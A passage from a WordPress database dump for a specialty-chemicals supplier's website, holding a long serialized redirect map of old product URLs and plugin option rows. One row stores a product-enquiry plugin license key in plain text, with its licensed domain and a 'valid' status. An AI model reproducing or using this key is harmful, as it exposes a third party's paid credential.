luorinated_lubricant_aerosol/?pg=2";a:2:{s:3:"url";s:58:"chemicals/lubricants/tribosys-lubricants/pfpe-oils-greases";s:4:"type";i:301;}s:43:"fluorinated_lubricant_aerosol/?pg=3&print=y";a:2:{s:3:"url";s:58:"chemicals/lubricants/tribosys-lubricants/pfpe-oils-greases";s:4:"type";i:301;}s:34:"fluoro-extreme%E2%84%A2-lubricants";a:2:{s:3:"url";s:58:"chemicals/lubricants/tribosys-lubricants/pfpe-oils-greases";s:4:"type";i:301;}s:34:"fluoro_extreme%E2%84%A2_lubricants";a:2:{s:3:"url";s:58:"chemicals/lubricants/tribosys-lubricants/pfpe-oils-greases";s:4:"type";i:301;}s:43:"fluoro_extreme%E2%84%A2_lubricants/?print=y";a:2:{s:3:"url";s:58:"chemicals/lubricants/tribosys-lubricants/pfpe-oils-greases";s:4:"type";i:301;}s:33:"heavy_duty_solvent__flux_remover_";a:2:{s:3:"url";s:18:"chemicals/solvents";s:4:"type";i:301;}s:42:"heavy_duty_solvent__flux_remover_/?print=y";a:2:{s:3:"url";s:18:"chemicals/solvents";s:4:"type";i:301;}s:50:"heavy_duty_solvent__no_clean_flux_remover/?print=y";a:2:{s:3:"url";s:18:"chemicals/solvents";s:4:"type";i:301;}s:16:"heloxy-modifiers";a:2:{s:3:"url";s:55:"chemicals/epoxy-resins/heloxyepoxy-functional-modifiers";s:4:"type";i:301;}s:25:"heloxy-modifiers/?print=y";a:2:{s:3:"url";s:55:"chemicals/epoxy-resins/heloxyepoxy-functional-modifiers";s:4:"type";i:301;}s:21:"home_001.htm?3e3ea140";a:2:{s:3:"url";s:1:"/";s:4:"type";i:301;}s:12:"home_004.htm";a:2:{s:3:"url";s:1:"/";s:4:"type";i:301;}s:9:"index.htm";a:2:{s:3:"url";s:1:"/";s:4:"type";i:301;}s:14:"ipc__san_diego";a:2:{s:3:"url";s:4:"news";s:4:"type";i:301;}s:33:"ipc__san_diego/?Archive=y&print=y";a:2:{s:3:"url";s:4:"news";s:4:"type";i:301;}s:52:"krytox%C2%AE_fluorinated_synthetic_lubricant_aerosol";a:2:{s:3:"url";s:58:"chemicals/lubricants/tribosys-lubricants/pfpe-oils-greases";s:4:"type";i:301;}s:10:"krytox.htm";a:2:{s:3:"url";s:6:"krytox";s:4:"type";i:301;}s:14:"krytox_002.htm";a:2:{s:3:"url";s:6:"krytox";s:4:"type";i:301;}s:14:"krytox_003.htm";a:2:{s:3:"url";s:6:"krytox";s:4:"type";i:301;}s:14:"krytox_004.htm";a:2:{s:3:"url";s:6:"krytox";s:4:"type";i:301;}s:14:"krytox_005.htm";a:2:{s:3:"url";s:6:"krytox";s:4:"type";i:301;}s:15:"krytox_cleaners";a:2:{s:3:"url";s:18:"chemicals/solvents";s:4:"type";i:301;}s:13:"krytoxaerosol";a:2:{s:3:"url";s:58:"chemicals/lubricants/tribosys-lubricants/pfpe-oils-greases";s:4:"type";i:301;}s:36:"lgw_heavy_duty_solvent__flux_remover";a:2:{s:3:"url";s:26:"chemicals/solvents/solvsys";s:4:"type";i:301;}s:7:"lit.htm";a:2:{s:3:"url";s:8:"articles";s:4:"type";i:301;}s:27:"low_global_warming_products";a:2:{s:3:"url";s:26:"chemicals/solvents/solvsys";s:4:"type";i:301;}s:38:"low_global_warming_products/?Archive=y";a:2:{s:3:"url";s:26:"chemicals/solvents/solvsys";s:4:"type";i:301;}s:46:"low_global_warming_products/?Archive=y&print=y";a:2:{s:3:"url";s:26:"chemicals/solvents/solvsys";s:4:"type";i:301;}s:21:"md__m_west_trade_show";a:2:{s:3:"url";s:4:"news";s:4:"type";i:301;}s:32:"md__m_west_trade_show/?Archive=y";a:2:{s:3:"url";s:4:"news";s:4:"type";i:301;}s:40:"md__m_west_trade_show/?Archive=y&print=y";a:2:{s:3:"url";s:4:"news";s:4:"type";i:301;}s:30:"md__m_west_trade_show/?print=y";a:2:{s:3:"url";s:4:"news";s:4:"type";i:301;}s:18:"media-head-cleaner";a:2:{s:3:"url";s:26:"chemicals/solvents/solvsys";s:4:"type";i:301;}s:27:"media_head_cleaner/?print=y";a:2:{s:3:"url";s:26:"chemicals/solvents/solvsys";s:4:"type";i:301;}s:28:"military-specs--nsn/?print=y";a:2:{s:3:"url";s:21:"mil-prf-27617-greases";s:4:"type";i:301;}s:8:"ms-122xd";a:2:{s:3:"url";s:16:"product/ms-122xd";s:4:"type";i:301;}s:17:"ms-143ax/?print=y";a:2:{s:3:"url";s:36:"product/universal-ptfe-release-agent";s:4:"type";i:301;}s:7:"ms-143e";a:2:{s:3:"url";s:32:"product/ptfe-mold-release-agents";s:4:"type";i:301;}s:16:"ms-143e/?print=y";a:2:{s:3:"url";s:32:"product/ptfe-mold-release-agents";s:4:"type";i:301;}s:7:"ms-143h";a:2:{s:3:"url";s:32:"product/ptfe-mold-release-agents";s:4:"type";i:301;}s:16:"ms-143h/?print=y";a:2:{s:3:"url";s:32:"product/ptfe-mold-release-agents";s:4:"type";i:301;}s:17:"ms-470c___ms-472c";a:2:{s:3:"url";s:55:"chemicals/conformal-coatings/urethane-conformal-coating";s:4:"type";i:301;}s:48:"n-PB_replacements_for_oxygen_cleaning/?Archive=y";a:2:{s:3:"url";s:14:"vertrel-fluids";s:4:"type";i:301;}s:56:"n-PB_replacements_for_oxygen_cleaning/?Archive=y&print=y";a:2:{s:3:"url";s:14:"vertrel-fluids";s:4:"type";i:301;}s:35:"news/default.aspx?Archive=y&F_All=y";a:2:{s:3:"url";s:4:"news";s:4:"type";i:301;}s:32:"news/default.aspx?Archive=y&pg=2";a:2:{s:3:"url";s:4:"news";s:4:"type";i:301;}s:32:"news/default.aspx?Archive=y&pg=3";a:2:{s:3:"url";s:4:"news";s:4:"type";i:301;}s:40:"news/default.aspx?Archive=y&print=y&pg=3";a:2:{s:3:"url";s:4:"news";s:4:"type";i:301;}s:35:"news/default.aspx?F_All=y&Archive=y";a:2:{s:3:"url";s:4:"news";s:4:"type";i:301;}s:30:"news/default.aspx?pg=2&print=y";a:2:{s:3:"url";s:4:"news";s:4:"type";i:301;}s:22:"news/default.aspx?pg=3";a:2:{s:3:"url";s:4:"news";s:4:"type";i:301;}s:25:"news/default.aspx?print=y";a:2:{s:3:"url";s:4:"news";s:4:"type";i:301;}s:35:"news/default.aspx?print=y&Archive=y";a:2:{s:3:"url";s:4:"news";s:4:"type";i:301;}s:33:"news/default.aspx?print=y&F_All=y";a:2:{s:3:"url";s:4:"news";s:4:"type";i:301;}s:30:"news/default.aspx?print=y&pg=1";a:2:{s:3:"url";s:4:"news";s:4:"type";i:301;}s:30:"news/default.aspx?print=y&pg=3";a:2:{s:3:"url";s:4:"news";s:4:"type";i:301;}s:32:"non-ptfe-release-agents/?print=y";a:2:{s:3:"url";s:24:"chemicals/release-agents";s:4:"type";i:301;}s:25:"npb_and_hcfc_225/?print=y";a:2:{s:3:"url";s:14:"vertrel-fluids";s:4:"type";i:301;}s:16:"other-lubricants";a:2:{s:3:"url";s:20:"chemicals/lubricants";s:4:"type";i:301;}s:15:"penetrating_oil";a:2:{s:3:"url";s:23:"product/penetrating-oil";s:4:"type";i:301;}s:12:"pfpe_cleaner";a:2:{s:3:"url";s:18:"chemicals/solvents";s:4:"type";i:301;}s:21:"pfpe_cleaner/?print=y";a:2:{s:3:"url";s:18:"chemicals/solvents";s:4:"type";i:301;}s:11:"pfpecleaner";a:2:{s:3:"url";s:18:"chemicals/solvents";s:4:"type";i:301;}s:20:"pfpecleaner/?print=y";a:2:{s:3:"url";s:18:"chemicals/solvents";s:4:"type";i:301;}s:26:"precision_cleaning_solvent";a:2:{s:3:"url";s:43:"chemicals/solvents/solvsys/solvent-cleaners";s:4:"type";i:301;}s:31:"precision_cleaning_solvent_lgw1";a:2:{s:3:"url";s:43:"chemicals/solvents/solvsys/solvent-cleaners";s:4:"type";i:301;}s:40:"precision_cleaning_solvent_lgw1/?print=y";a:2:{s:3:"url";s:43:"chemicals/solvents/solvsys/solvent-cleaners";s:4:"type";i:301;}s:19:"privacy_policy.aspx";a:2:{s:3:"url";s:1:"/";s:4:"type";i:301;}s:27:"privacy_policy.aspx?print=y";a:2:{s:3:"url";s:1:"/";s:4:"type";i:301;}s:36:"products/default.aspx?DepartmentId=1";a:2:{s:3:"url";s:17:"chemical-products";s:4:"type";i:301;}s:37:"products/default.aspx?DepartmentId=10";a:2:{s:3:"url";s:17:"chemical-products";s:4:"type";i:301;}s:38:"products/default.aspx?DepartmentId=105";a:2:{s:3:"url";s:17:"chemical-products";s:4:"type";i:301;}s:38:"products/default.aspx?DepartmentId=108";a:2:{s:3:"url";s:17:"chemical-products";s:4:"type";i:301;}s:38:"products/default.aspx?DepartmentId=109";a:2:{s:3:"url";s:17:"chemical-products";s:4:"type";i:301;}s:38:"products/default.aspx?DepartmentId=110";a:2:{s:3:"url";s:17:"chemical-products";s:4:"type";i:301;}s:38:"products/default.aspx?DepartmentId=117";a:2:{s:3:"url";s:17:"chemical-products";s:4:"type";i:301;}s:37:"products/default.aspx?DepartmentId=27";a:2:{s:3:"url";s:17:"chemical-products";s:4:"type";i:301;}s:37:"products/default.aspx?DepartmentId=29";a:2:{s:3:"url";s:17:"chemical-products";s:4:"type";i:301;}s:37:"products/default.aspx?DepartmentId=30";a:2:{s:3:"url";s:17:"chemical-products";s:4:"type";i:301;}s:37:"products/default.aspx?DepartmentId=36";a:2:{s:3:"url";s:17:"chemical-products";s:4:"type";i:301;}s:37:"products/default.aspx?DepartmentId=38";a:2:{s:3:"url";s:17:"chemical-products";s:4:"type";i:301;}s:37:"products/default.aspx?DepartmentId=40";a:2:{s:3:"url";s:17:"chemical-products";s:4:"type";i:301;}s:37:"products/default.aspx?DepartmentId=44";a:2:{s:3:"url";s:17:"chemical-products";s:4:"type";i:301;}s:37:"products/default.aspx?DepartmentId=46";a:2:{s:3:"url";s:17:"chemical-products";s:4:"type";i:301;}s:36:"products/default.aspx?DepartmentId=5";a:2:{s:3:"url";s:17:"chemical-products";s:4:"type";i:301;}s:37:"products/default.aspx?DepartmentId=51";a:2:{s:3:"url";s:17:"chemical-products";s:4:"type";i:301;}s:37:"products/default.aspx?DepartmentId=53";a:2:{s:3:"url";s:17:"chemical-products";s:4:"type";i:301;}s:37:"products/default.aspx?DepartmentId=55";a:2:{s:3:"url";s:17:"chemical-products";s:4:"type";i:301;}s:37:"products/default.aspx?DepartmentId=57";a:2:{s:3:"url";s:17:"chemical-products";s:4:"type";i:301;}s:36:"products/default.aspx?DepartmentId=6";a:2:{s:3:"url";s:17:"chemical-products";s:4:"type";i:301;}s:37:"products/default.aspx?DepartmentId=66";a:2:{s:3:"url";s:17:"chemical-products";s:4:"type";i:301;}s:36:"products/default.aspx?DepartmentId=7";a:2:{s:3:"url";s:17:"chemical-products";s:4:"type";i:301;}s:37:"products/default.aspx?DepartmentId=75";a:2:{s:3:"url";s:17:"chemical-products";s:4:"type";i:301;}s:37:"products/default.aspx?DepartmentId=77";a:2:{s:3:"url";s:17:"chemical-products";s:4:"type";i:301;}s:37:"products/default.aspx?DepartmentId=79";a:2:{s:3:"url";s:17:"chemical-products";s:4:"type";i:301;}s:36:"products/default.aspx?DepartmentId=9";a:2:{s:3:"url";s:17:"chemical-products";s:4:"type";i:301;}s:18:"protective-varnish";a:2:{s:3:"url";s:47:"chemicals/conformal-coatings/protective-varnish";s:4:"type";i:301;}s:26:"protective_varnish_ms-452n";a:2:{s:3:"url";s:15:"product/ms-252n";s:4:"type";i:301;}s:35:"protective_varnish_ms-452n/?print=y";a:2:{s:3:"url";s:15:"product/ms-252n";s:4:"type";i:301;}s:37:"protectiveconformal-coatings/?print=y";a:2:{s:3:"url";s:28:"chemicals/conformal-coatings";s:4:"type";i:301;}s:42:"ptfe-release-agent--dry-lubricant/?print=y";a:2:{s:3:"url";s:44:"chemicals/release-agents/ptfe-release-agents";s:4:"type";i:301;}s:11:"quik-freeze";a:2:{s:3:"url";s:27:"product/quik-freeze-ms-242n";s:4:"type";i:301;}s:17:"quik-freeze%C2%AE";a:2:{s:3:"url";s:27:"product/quik-freeze-ms-242n";s:4:"type";i:301;}s:26:"quik-freeze%C2%AE/?print=y";a:2:{s:3:"url";s:27:"product/quik-freeze-ms-242n";s:4:"type";i:301;}s:31:"quik-freeze-antistatic/?print=y";a:2:{s:3:"url";s:30:"product/quik-freeze-antistatic";s:4:"type";i:301;}s:11:"release.htm";a:2:{s:3:"url";s:24:"chemicals/release-agents";s:4:"type";i:301;}s:15:"release_001.htm";a:2:{s:3:"url";s:24:"chemicals/release-agents";s:4:"type";i:301;}s:15:"release_002.htm";a:2:{s:3:"url";s:24:"chemicals/release-agents";s:4:"type";i:301;}s:15:"release_003.htm";a:2:{s:3:"url";s:24:"chemicals/release-agents";s:4:"type";i:301;}s:15:"release_004.htm";a:2:{s:3:"url";s:24:"chemicals/release-agents";s:4:"type";i:301;}s:12:"rtv-sealants";a:2:{s:3:"url";s:22:"chemicals/epoxy-resins";s:4:"type";i:301;}s:21:"rtv-sealants/?print=y";a:2:{s:3:"url";s:22:"chemicals/epoxy-resins";s:4:"type";i:301;}s:41:"safezone_cleaner_for_plastic_glass__metal";a:2:{s:3:"url";s:35:"product/plastic-glass-metal-cleaner";s:4:"type";i:301;}s:16:"sampe_trade_show";a:2:{s:3:"url";s:4:"news";s:4:"type";i:301;}s:35:"sampe_trade_show/?Archive=y&print=y";a:2:{s:3:"url";s:4:"news";s:4:"type";i:301;}s:16:"solvent-cleaners";a:2:{s:3:"url";s:43:"chemicals/solvents/solvsys/solvent-cleaners";s:4:"type";i:301;}s:20:"solvent_cleaners.htm";a:2:{s:3:"url";s:43:"chemicals/solvents/solvsys/solvent-cleaners";s:4:"type";i:301;}s:24:"solvent_cleaners_002.htm";a:2:{s:3:"url";s:43:"chemicals/solvents/solvsys/solvent-cleaners";s:4:"type";i:301;}s:24:"solvent_cleaners_003.htm";a:2:{s:3:"url";s:43:"chemicals/solvents/solvsys/solvent-cleaners";s:4:"type";i:301;}s:24:"solvent_cleaners_005.htm";a:2:{s:3:"url";s:43:"chemicals/solvents/solvsys/solvent-cleaners";s:4:"type";i:301;}s:24:"solvent_cleaners_006.htm";a:2:{s:3:"url";s:43:"chemicals/solvents/solvsys/solvent-cleaners";s:4:"type";i:301;}s:9:"specs.htm";a:2:{s:3:"url";s:8:"articles";s:4:"type";i:301;}s:13:"specs_003.htm";a:2:{s:3:"url";s:8:"articles";s:4:"type";i:301;}s:15:"surface-cleaner";a:2:{s:3:"url";s:43:"chemicals/solvents/solvsys/contact-cleaners";s:4:"type";i:301;}s:24:"surface_cleaner/?print=y";a:2:{s:3:"url";s:43:"chemicals/solvents/solvsys/contact-cleaners";s:4:"type";i:301;}s:33:"ultra_low_global_warming_products";a:2:{s:3:"url";s:26:"chemicals/solvents/solvsys";s:4:"type";i:301;}s:42:"ultra_low_global_warming_products/?print=y";a:2:{s:3:"url";s:26:"chemicals/solvents/solvsys";s:4:"type";i:301;}s:7:"vertrel";a:2:{s:3:"url";s:26:"chemicals/solvents/vertrel";s:4:"type";i:301;}s:35:"vertrel%C2%AE_xsi_silicone_solvent_";a:2:{s:3:"url";s:20:"product/vertrel-x-si";s:4:"type";i:301;}s:44:"vertrel%C2%AE_xsi_silicone_solvent_/?print=y";a:2:{s:3:"url";s:20:"product/vertrel-x-si";s:4:"type";i:301;}s:27:"vertrel_mca_cleaning_agent_";a:2:{s:3:"url";s:19:"product/vertrel-mca";s:4:"type";i:301;}s:36:"vertrel_mca_cleaning_agent_/?print=y";a:2:{s:3:"url";s:19:"product/vertrel-mca";s:4:"type";i:301;}s:45:"vertrel_smt_heavy_duty_solvent__flux_remover_";a:2:{s:3:"url";s:19:"product/vertrel-smt";s:4:"type";i:301;}s:54:"vertrel_smt_heavy_duty_solvent__flux_remover_/?print=y";a:2:{s:3:"url";s:19:"product/vertrel-smt";s:4:"type";i:301;}s:25:"vertrel_xf_cleaning_agent";a:2:{s:3:"url";s:18:"product/vertrel-xf";s:4:"type";i:301;}s:25:"water-base-release-agents";a:2:{s:3:"url";s:24:"chemicals/release-agents";s:4:"type";i:301;}s:39:"water_based_release_agent_for_hot_molds";a:2:{s:3:"url";s:24:"chemicals/release-agents";s:4:"type";i:301;}s:28:"you_are_invited.aspx?print=y";a:2:{s:3:"url";s:5:"about";s:4:"type";i:301;}s:33:"chemicals/epoxy-resins/epon-epoxy";a:2:{s:3:"url";s:39:"chemicals/epoxy-resins/epon-epoxy-resin";s:4:"type";i:301;}s:16:"product/ms-153bn";a:2:{s:3:"url";s:38:"product/high-temperature-release-agent";s:4:"type";i:301;}s:41:"chemicals/release-agents/high-temperature";a:2:{s:3:"url";s:49:"chemicals/release-agents/high-temp-release-agents";s:4:"type";i:301;}s:5:"about";a:2:{s:3:"url";s:17:"miller-stephenson";s:4:"type";i:301;}s:17:"miller-stephenson";a:2:{s:3:"url";s:23:"about-miller-stephenson";s:4:"type";i:301;}s:54:"chemicals/epoxy-resins/epirez-waterborne-resin-epi-rez";a:2:{s:3:"url";s:43:"chemicals/epoxy-resins/epi-rez-epoxy-resins";s:4:"type";i:301;}s:27:"product/quik-freeze-ms-242n";a:2:{s:3:"url";s:19:"product/quik-freeze";s:4:"type";i:301;}s:12:"product/sion";a:2:{s:3:"url";s:19:"product/opteon-sion";s:4:"type";i:301;}s:29:"product/ms-470s-12-oz-aerosol";a:2:{s:3:"url";s:43:"product/mil-spec-urethane-conformal-coating";s:4:"type";i:301;}s:15:"product/ms-252n";a:2:{s:3:"url";s:33:"product/varnish-conformal-coating";s:4:"type";i:301;}s:49:"chemicals/lubricants/krytox-lubricants/vpf-krytox";a:2:{s:3:"url";s:51:"chemicals/lubricants/krytox-lubricants/other-krytox";s:4:"type";i:301;}s:13:"product/143az";a:2:{s:3:"url";s:20:"product/krytox-143az";s:4:"type";i:301;}s:24:"chemicals/release-agents";a:2:{s:3:"url";s:29:"chemicals/mold-release-agents";s:4:"type";i:301;}s:17:"product/ms-122sel";a:2:{s:3:"url";s:45:"product/low-global-warming-ptfe-release-agent";s:4:"type";i:301;}s:15:"product/ms-755l";a:2:{s:3:"url";s:28:"product/ms-755l-flux-remover";s:4:"type";i:301;}s:24:"product/dental-lubricant";a:2:{s:3:"url";s:35:"product/dental-handpiece-lubricants";s:4:"type";i:301;}s:47:"composite-mold-release-agents-miller-stephenson";a:2:{s:3:"url";s:29:"composite-mold-release-agents";s:4:"type";i:301;}s:64:"chemicals/lubricants/tribosys-lubricants/ptfe-dryfilm-lubricants";a:2:{s:3:"url";s:44:"chemicals/lubricants/ptfe-dryfilm-lubricants";s:4:"type";i:301;}s:44:"chemicals/lubricants/ptfe-dryfilm-lubricants";a:2:{s:3:"url";s:45:"chemicals/lubricants/ptfe-dry-film-lubricants";s:4:"type";i:301;}s:26:"product/aeroduster-ms-222n";a:2:{s:3:"url";s:27:"product/aero-duster-ms-222n";s:4:"type";i:301;}s:44:"product/semi-permanent-mold-release-agents-2";a:2:{s:3:"url";s:22:"product/release-agents";s:4:"type";i:301;}s:37:"product/rubber-molding-release-agents";a:2:{s:3:"url";s:34:"product/rubber-mold-release-agents";s:4:"type";i:301;}s:17:"conformal-coating";a:2:{s:3:"url";s:18:"conformal-coatings";s:4:"type";i:301;}s:30:"product/dry-film-release-agent";a:2:{s:3:"url";s:38:"product/water-based-ptfe-release-agent";s:4:"type";i:301;}s:42:"product/semi-permanent-mold-release-agents";a:2:{s:3:"url";s:35:"product/urethane-mold-release-agent";s:4:"type";i:301;}s:31:"product/dry-film-release-agents";a:2:{s:3:"url";s:34:"product/water-based-release-agents";s:4:"type";i:301;}s:34:"product/water-based-release-agents";a:2:{s:3:"url";s:39:"product/ptfe-water-based-release-agents";s:4:"type";i:301;}s:26:"product/mold-release-agent";a:2:{s:3:"url";s:38:"product/water-based-mold-release-agent";s:4:"type";i:301;}s:19:"mold-release-agents";a:2:{s:3:"url";s:18:"mold-release-agent";s:4:"type";i:301;}s:27:"product/ptfe-release-agents";a:2:{s:3:"url";s:40:"product/water-based-mold-release-agent-2";s:4:"type";i:301;}s:40:"product/water-based-mold-release-agent-2";a:2:{s:3:"url";s:39:"product/water-based-mold-release-agents";s:4:"type";i:301;}s:28:"chemicals/conformal-coatings";a:2:{s:3:"url";s:27:"chemicals/conformal-coating";s:4:"type";i:301;}s:15:"product/ms-472s";a:2:{s:3:"url";s:39:"product/polyurethane-conformal-coatings";s:4:"type";i:301;}s:35:"product/plastic-glass-metal-cleaner";a:2:{s:3:"url";s:14:"product/ms-260";s:4:"type";i:301;}s:21:"product/contact-re-nu";a:2:{s:3:"url";s:29:"product/ms-532n-contact-re-nu";s:4:"type";i:301;}s:29:"product/ms-532n-contact-re-nu";a:2:{s:3:"url";s:29:"product/ms-530n-contact-re-nu";s:4:"type";i:301;}s:15:"product/ms-124h";a:2:{s:3:"url";s:35:"product/ms-124h-connector-lubricant";s:4:"type";i:301;}s:11:"product/the";a:2:{s:3:"url";s:37:"product/teflon-heavy-equipment-grease";s:4:"type";i:301;}s:12:"product/1102";a:2:{s:3:"url";s:31:"product/teflon-high-temp-grease";s:4:"type";i:301;}s:21:"product/tribosys-214x";a:2:{s:3:"url";s:41:"product/tribosys-214x-gear-box-lubricants";s:4:"type";i:301;}s:21:"product/tribosys-216x";a:2:{s:3:"url";s:42:"product/tribosys-216x-compressor-lubricant";s:4:"type";i:301;}s:21:"product/tribosys-217x";a:2:{s:3:"url";s:36:"product/tribosys-217x-hydraulic-oils";s:4:"type";i:301;}s:21:"product/tribosys-212x";a:2:{s:3:"url";s:32:"product/tribosys-212x-chain-oils";s:4:"type";i:301;}s:21:"product/tribosys-218x";a:2:{s:3:"url";s:39:"product/tribosys-218x-roller-chain-oils";s:4:"type";i:301;}s:22:"product/triobosys-2200";a:2:{s:3:"url";s:49:"product/tribosys-2200-food-grade-silicone-aerosol";s:4:"type";i:301;}s:21:"product/tribosys-222x";a:2:{s:3:"url";s:46:"product/tribosys-222x-high-temperature-greases";s:4:"type";i:301;}s:21:"product/tribosys-221x";a:2:{s:3:"url";s:45:"product/tribosys-221x-general-purpose-greases";s:4:"type";i:301;}s:22:"category/uncategorized";a:2:{s:3:"url";s:22:"category/press-release";s:4:"type";i:301;}s:21:"product/tribosys-223x";a:2:{s:3:"url";s:40:"product/tribosys-223x-food-grade-greases";s:4:"type";i:301;}s:21:"product/tribosys-211x";a:2:{s:3:"url";s:42:"product/tribosys-211x-general-purpose-oils";s:4:"type";i:301;}s:37:"product/cleaning-solvent-flux-remover";a:2:{s:3:"url";s:41:"product/cleaning-solvent-and-flux-remover";s:4:"type";i:301;}s:43:"http://miller-stephenson.com/release-agents";a:2:{s:3:"url";s:29:"chemicals/mold-release-agents";s:4:"type";i:301;}s:29:"http://miller-stephenson.com/";a:2:{s:3:"url";s:1:"/";s:4:"type";i:301;}s:18:"ptfe-release-agent";a:2:{s:3:"url";s:29:"chemicals/mold-release-agents";s:4:"type";i:301;}s:33:"ptfe-release-agent--dry-lubricant";a:2:{s:3:"url";s:29:"chemicals/mold-release-agents";s:4:"type";i:301;}s:5:"epoxy";a:2:{s:3:"url";s:22:"chemicals/epoxy-resins";s:4:"type";i:301;}s:17:"epon-epoxy-resins";a:2:{s:3:"url";s:22:"chemicals/epoxy-resins";s:4:"type";i:301;}s:15:"contact_us.aspx";a:2:{s:3:"url";s:7:"contact";s:4:"type";i:301;}s:11:"techsup.htm";a:2:{s:3:"url";s:12:"tech-support";s:4:"type";i:301;}s:35:"http://miller-stephenson.com/krytox";a:2:{s:3:"url";s:6:"krytox";s:4:"type";i:301;}s:28:"miller-stephenson.com/krytox";a:2:{s:3:"url";s:6:"krytox";s:4:"type";i:301;}s:10:"lubricants";a:2:{s:3:"url";s:6:"krytox";s:4:"type";i:301;}s:36:"miller-stephenson.com/release-agents";a:2:{s:3:"url";s:29:"chemicals/mold-release-agents";s:4:"type";i:301;}s:14:"release-agents";a:2:{s:3:"url";s:29:"chemicals/mold-release-agents";s:4:"type";i:301;}s:51:"product/millube-perfluorinated-synthetic-lubricants";a:2:{s:3:"url";s:43:"product/biocompatible-lubricants-grease-oil";s:4:"type";i:301;}s:56:"chemicals/lubricants/krytox-lubricants/krytox-fpg-grease";a:2:{s:3:"url";s:73:"chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-fpg-grease";s:4:"type";i:301;}s:17:"product/ms-555557";a:2:{s:3:"url";s:40:"product/heavy-duty-solvent-ms-555-ms-557";s:4:"type";i:301;}s:40:"chemicals/solvents/solvsys/flux-removers";a:2:{s:3:"url";s:47:"chemicals/solvents/solvsys/flux-remover-catalog";s:4:"type";i:301;}s:17:"product/ms-560562";a:2:{s:3:"url";s:34:"product/flux-cleaner-ms-560-ms-562";s:4:"type";i:301;}s:28:"product/ms-755l-flux-remover";a:2:{s:3:"url";s:28:"product/flux-remover-ms-755l";s:4:"type";i:301;}s:17:"product/ms-725727";a:2:{s:3:"url";s:35:"product/flux-removers-ms-755-ms-757";s:4:"type";i:301;}s:15:"product/h0805ab";a:2:{s:3:"url";s:26:"product/flux-remover-spray";s:4:"type";i:301;}s:40:"product/850g-90xx-waterbased-acid-primer";a:2:{s:3:"url";s:29:"product/ptfe-medical-coatings";s:4:"type";i:301;}s:75:"chemicals/mold-release-agents/semi-permanent-release-agents/releasys-liquid";a:2:{s:3:"url";s:77:"chemicals/mold-release-agents/semi-permanent-release-agents/injection-molding";s:4:"type";i:301;}s:82:"chemicals/mold-release-agents/semi-permanent-release-agents/specialty-mold-release";a:2:{s:3:"url";s:52:"chemicals/mold-release-agents/specialty-mold-release";s:4:"type";i:301;}s:54:"chemicals/conformal-coating/conformal-coating-stripper";a:2:{s:3:"url";s:61:"chemicals/conformal-coating/conformal-coating-stripping-agent";s:4:"type";i:301;}s:73:"chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-fpg-grease";a:2:{s:3:"url";s:107:"chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-fpg-grease";s:4:"type";i:301;}}', 'no'); 
INSERT INTO `wp_options` VALUES (24494, 'wpseo-premium-redirects-export-regex', 'a:0:{}', 'no'); 
INSERT INTO `wp_options` VALUES (27418, 'wpseo_sitemap_category_cache_validator', '6cXud', 'no'); 
INSERT INTO `wp_options` VALUES (27459, 'wpseo_sitemap_post_cache_validator', '4Fahm', 'no'); 
INSERT INTO `wp_options` VALUES (27498, 'wpseo_sitemap_post_tag_cache_validator', '6YJh7', 'no'); 
INSERT INTO `wp_options` VALUES (37816, 'wpseo_sitemap_author_cache_validator', 'oJKA', 'no'); 
INSERT INTO `wp_options` VALUES (39274, 'wpseo_sitemap_ywtm_tab_cache_validator', '4NnYw', 'no'); 
INSERT INTO `wp_options` VALUES (42613, 'quoteup_total_updated', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (42614, 'quoteup_settings_convert_to_checkbox', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (42615, 'quoteup_convert_per_product_pep_dropdown', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (42616, 'quoteup_convert_per_product_add_to_cart_dropdown', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (42619, 'quoteup_convert_history_status', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (42620, 'quoteup_settings_convert_old_checkboxes', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (42621, 'wdm_quoteup_version', '4.1.0', 'yes'); 
INSERT INTO `wp_options` VALUES (42645, 'edd_pep_license_key', '377714fc489c4b201923ca44e8f07990', 'yes'); 
INSERT INTO `wp_options` VALUES (42646, 'wdm_pep_product_site', 'https://wisdmlabs.com/downloads/product-enquiry-pro/', 'yes'); 
INSERT INTO `wp_options` VALUES (42647, 'wdm_pep_license_key_sites', 'a:1:{i:0;a:1:{i:0;s:22:"miller-stephenson.com/";}}', 'yes'); 
INSERT INTO `wp_options` VALUES (42648, 'wdm_pep_license_max_site', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (42649, 'edd_pep_license_status', 'valid', 'yes'); 
INSERT INTO `wp_options` VALUES (46408, 'wpseo_sitemap_nav_menu_item_cache_validator', '4WUIL', 'no'); 
INSERT INTO `wp_options` VALUES (46409, 'wpseo_sitemap_nav_menu_cache_validator', '4WUJr', 'no'); 
INSERT INTO `wp_options` VALUES (69877, 'wpseo_sitemap_2056_cache_validator', '4xCIX', 'no'); 
INSERT INTO `wp_options` VALUES (75367, 'show_author_options', 'a:4:{s:15:"option_url_show";s:0:"";s:15:"option_url_hide";s:0:"";s:15:"option_by_class";s:0:"";s:15:"option_by_regex";s:0:"";}', 'yes'); 
INSERT INTO `wp_options` VALUES (77045, 'wpseo_sitemap_dp_template_cache_validator', '6b8Em', 'no'); 
INSERT INTO `wp_options` VALUES (80428, 'disable_comments_options', 'a:5:{s:19:"disabled_post_types";a:5:{i:0;s:4:"post";i:1;s:4:"page";i:2;s:10:"attachment";i:3;s:7:"product";i:4;s:13:"featured_item";}s:17:"remove_everywhere";b:1;s:9:"permanent";b:0;s:16:"extra_post_types";b:0;s:10:"db_version";i:6;}', 'yes'); 
INSERT INTO `wp_options` VALUES (84186, 'ridwpa_version', '1.4.6.2', 'yes'); 
INSERT INTO `wp_options` VALUES (85464, 'wpseo_sitemap_942_cache_validator', '5VU7a', 'no'); 
INSERT INTO `wp_options` VALUES (85465, 'wpseo_sitemap_916_cache_validator', '5VUaE', 'no'); 
